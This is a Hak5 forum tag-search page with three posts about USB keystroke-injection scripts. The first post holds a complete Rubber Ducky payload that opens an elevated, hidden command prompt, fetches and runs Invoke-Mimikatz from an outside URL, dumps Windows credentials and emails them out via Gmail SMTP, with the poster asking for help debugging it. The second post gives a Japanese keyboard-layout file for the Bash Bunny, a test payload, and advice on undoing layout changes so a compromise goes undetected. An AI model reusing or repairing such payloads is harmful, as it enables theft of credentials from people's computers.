Jump to content

Search the Community

Showing results for tags 'ducky script'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

Found 3 results

  1. I am trying to add a twist on the 15 second password stealer i robot hack in which it emails the credentials instead of uploading them to a server. This is my code. I changed the email addresses and passwords for security. DELAY 3000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://darren.kitchen/im.ps1');$output = Invoke-Mimikatz -DumpCreds; $output > log.txt;" ENTER DELAY 1500 STRING powershell ENTER STRING $SMTPServer = 'smtp.gmail.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('MyEmail1@gmail.com', 'MyPassword') ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'MyEmail1@gmail.com' ENTER STRING $ReportEmail.To.Add('MyEmail2@gmail.com') ENTER STRING $ReportEmail.Subject = 'PassDump' ENTER STRING $ReportEmail.Body = (Get-Content Log.txt | out-string) ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER DELAY 2000 STRING exit ENTER DELAY 500 REM Clear the Run history and exit ENTER STRING exit ENTER and in my email in-box all i got was a email that said the words " How do I get it so it actually sends the output of Invoke-Mmikats instead of literally sending the words Invoke-Mimikatz. Thanks in advance.
  2. So I started to work on the Bash Bunny to be able to handle non-US keyboard layout attacks for ATTACKMODE HID. To enable the SET_LANGUAGE option you need to add a [LanguageDescription].json under /root/tools/language. I used the default "us.json" as a working template. (you wanna back it up and copy it and not work of the original file) Here is an example of Japanese keyboard layout description file: (i.e.:ja.json , however you can make it ja_win.json for specific environments.) ---ja.json (created under /root/tools/languages/ )--- { "__comment": "All numbers here are in hex format and 0x is ignored.", "__comment": " ", "__comment": "This list is in ascending order of 3rd byte (HID Usage ID).", "__comment": " See section 10 Keyboard/Keypad Page (0x07)", "__comment": " of document USB HID Usage Tables Version 1.12.", "__comment": " ", "__comment": "Definition of these 3 bytes can be found", "__comment": " in section B.1 Protocol 1 (Keyboard)", "__comment": " of document Device Class Definition for HID Version 1.11", "__comment": " - byte 1: Modifier keys", "__comment": " - byte 2: Reserved", "__comment": " - byte 3: Keycode 1", "__comment": " ", "__comment": "Both documents can be obtained from link here", "__comment": " http://www.usb.org/developers/hidpage/", "__comment": " ", "__comment": "A = LeftShift + a, { = LeftShift + [", "__comment": " ", "CTRL": "01,00,00", "CONTROL": "01,00,00", "SHIFT": "02,00,00", "ALT": "04,00,00", "GUI": "08,00,00", "WINDOWS": "08,00,00", "CTRL-ALT": "05,00,00", "CTRL-SHIFT": "03,00,00", "ALT-SHIFT": "06,00,00", "__comment": "Below 5 key combinations are for Mac OSX", "__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal", "COMMAND": "08,00,00", "COMMAND-CTRL": "09,00,00", "COMMAND-CTRL-SHIFT": "0B,00,00", "COMMAND-OPTION": "0C,00,00", "COMMAND-OPTION-SHIFT": "0E,00,00", "a": "00,00,04", "A": "02,00,04", "b": "00,00,05", "B": "02,00,05", "c": "00,00,06", "C": "02,00,06", "d": "00,00,07", "D": "02,00,07", "e": "00,00,08", "E": "02,00,08", "f": "00,00,09", "F": "02,00,09", "g": "00,00,0a", "G": "02,00,0a", "h": "00,00,0b", "H": "02,00,0b", "i": "00,00,0c", "I": "02,00,0c", "j": "00,00,0d", "J": "02,00,0d", "k": "00,00,0e", "K": "02,00,0e", "l": "00,00,0f", "L": "02,00,0f", "m": "00,00,10", "M": "02,00,10", "n": "00,00,11", "N": "02,00,11", "o": "00,00,12", "O": "02,00,12", "p": "00,00,13", "P": "02,00,13", "q": "00,00,14", "Q": "02,00,14", "r": "00,00,15", "R": "02,00,15", "s": "00,00,16", "S": "02,00,16", "t": "00,00,17", "T": "02,00,17", "u": "00,00,18", "U": "02,00,18", "v": "00,00,19", "V": "02,00,19", "w": "00,00,1a", "W": "02,00,1a", "x": "00,00,1b", "X": "02,00,1b", "y": "00,00,1c", "Y": "02,00,1c", "z": "00,00,1d", "Z": "02,00,1d", "1": "00,00,1e", "!": "02,00,1e", "2": "00,00,1f", "\"": "02,00,1f", "#": "02,00,20", "4": "00,00,21", "$": "02,00,21", "5": "00,00,22", "%": "02,00,22", "6": "00,00,23", "&": "02,00,23", "7": "00,00,24", "'": "02,00,24", "8": "00,00,25", "(": "02,00,25", "9": "00,00,26", ")": "02,00,26", "0": "00,00,27", "ENTER": "00,00,28", "ESC": "00,00,29", "ESCAPE": "00,00,29", "BACKSPACE": "00,00,2a", "TAB": "00,00,2b", "ALT-TAB": "04,00,2b", "SPACE": "00,00,2c", " ": "00,00,2c", "-": "00,00,2d", "=": "02,00,2d", "^": "00,00,2e", "~": "02,00,2e", "@": "00,00,2f", "`": "02,00,2f", "[": "00,00,30", "{": "02,00,30", "]": "00,00,32", "}": "02,00,32", ";": "00,00,33", "+": "02,00,33", ":": "00,00,34", "*": "02,00,34", ",": "00,00,36", "<": "02,00,36", ".": "00,00,37", ">": "02,00,37", "\/": "00,00,38", "?": "02,00,38", "CAPSLOCK": "00,00,39", "F1": "00,00,3a", "F2": "00,00,3b", "F3": "00,00,3c", "F4": "00,00,3d", "F5": "00,00,3e", "F6": "00,00,3f", "F7": "00,00,40", "F8": "00,00,41", "F9": "00,00,42", "F10": "00,00,43", "F11": "00,00,44", "F12": "00,00,45", "PRINTSCREEN":"00,00,46", "SCROLLLOCK": "00,00,47", "PAUSE": "00,00,48", "BREAK": "00,00,48", "INSERT": "00,00,49", "HOME": "00,00,4a", "PAGEUP": "00,00,4b", "DELETE": "00,00,4c", "DEL": "00,00,4c", "END": "00,00,4d", "PAGEDOWN": "00,00,4e", "RIGHTARROW": "00,00,4f", "RIGHT": "00,00,4f", "LEFTARROW": "00,00,50", "LEFT": "00,00,50", "DOWNARROW": "00,00,51", "DOWN": "00,00,51", "UPARROW": "00,00,52", "UP": "00,00,52", "NUMLOCK": "00,00,53", "MENU": "00,00,65”, "APP": "00,00,65", "\\": "00,00,87", "_": "02,00,87", "\\": "00,00,89", "|": "02,00,89" } There are still some caveats I need to work out, somehow I can't get " ¥,| "(USB HID Keycode 87) and " ¥_ "(USB HID Keycode 89) to work but the rest seems fine. (I suspect that this is due to the fact these keys do not exist on a regular 101-US keyboard and there are no modifier combinations to trigger it neither, which is gonna be problematic since they are used as a backslash in file paths. But I'll work some more to figure it out.) Workaround for Windows: For Windows you can use powershell to set the layout to a US keyboard by using "New-WinUserLanguageList en-US", which installs a US-keyboard layout then issue a "Set-WinUserLanguageList -LanguageList en-US" to set the default layout to a US keyboard , its a bit slower but if you have the time, this way is easier, you do need to reset the settings with issuing another Set-WinUserLanguageList -LanguageList [WHATEVERLANGUAGE] it was, otherwise the compromise will be detected. ----sample payload.txt--- #!/bin/bash ATTACKMODE HID VID 0x45E PID 0x07B3 Q SET_LANGUAGE ja Q DELAY 5000 Q STRING starting with ja language option Q ENTER Q switch1/quack.txt Q ENTER Q DELAY 200 Q ENTER STRING done LED R ---quack.txt( to test basic and special characters.)--- STRING quacking DELAY 2000 ENTER DELAY 750 STRING abcdefghijklmnop DELAY 500 ENTER STRING ABCDEFGHIJKLMNOP DELAY 500 ENTER STRING 1234567890-^\ DELAY 500 ENTER STRING !"#$%&'()0=~| DELAY 500 ENTER STRING @[;:],./ DELAY 500 ENTER STRING `{+*}<>? DELAY 500 ENTER
  3. what is the longest ducky script created. what is the max space in kilobytes a single ducky script(in text, not complied) would ever take up?
×
×
  • Create New...